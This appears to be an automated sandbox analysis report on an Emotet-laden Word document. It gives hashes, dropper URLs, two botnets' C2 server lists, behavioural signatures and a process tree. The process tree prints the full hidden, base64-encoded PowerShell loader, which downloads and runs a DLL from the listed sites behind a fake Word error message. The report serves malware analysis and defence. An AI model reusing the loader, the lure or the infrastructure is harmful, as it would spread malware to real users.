Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-03-2021 16:01

General

  • Target

    DAT_2112.doc

  • Size

    201KB

  • MD5

    0b0b1ef804382ed6f25b3aa11b657b72

  • SHA1

    cfd0c0603103c585185433aaf1d53879e97d5d31

  • SHA256

    687a53748f70c72633a9f00a47b027ca46def57962e21f2150a82e7567bd1c25

  • SHA512

    7043392bd4604a1321c6253041ebd095eaef2282bc4a35fd9679349a46be0e8a03a7d357a1a4a3000ff9135b2aeeac3438b2a460e51711213b76639a6eafaf5e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://biglaughs.org/smallpotatoes/rRwRzc/

exe.dropper

http://josegene.com/theme/gU8/

exe.dropper

http://paulscomputing.com/CraigsMagicSquare/H/

exe.dropper

https://goldilockstraining.com/wp-includes/bftt/

exe.dropper

https://jeffdahlke.com/css/bg4n3/

exe.dropper

http://azraktours.com/wp-content/NWF9jC/

exe.dropper

http://goldcoastoffice365.com/temp/X/

Extracted

Family

emotet

Botnet

Epoch1

C2

184.66.18.83:80

202.187.222.40:80

167.71.148.58:443

211.215.18.93:8080

1.234.65.61:80

80.15.100.37:80

155.186.9.160:80

172.104.169.32:8080

110.39.162.2:443

12.162.84.2:8080

181.136.190.86:80

68.183.190.199:8080

191.223.36.170:80

190.45.24.210:80

81.213.175.132:80

181.120.29.49:80

82.76.111.249:443

177.23.7.151:80

95.76.153.115:80

93.148.247.169:80

rsa_pubkey.plain

Extracted

Family

emotet

Botnet

LEA

C2

80.158.3.161:443

80.158.51.209:8080

80.158.35.51:80

80.158.63.78:443

80.158.53.167:80

80.158.62.194:443

80.158.59.174:8080

80.158.43.136:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DAT_2112.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1812
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1432
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA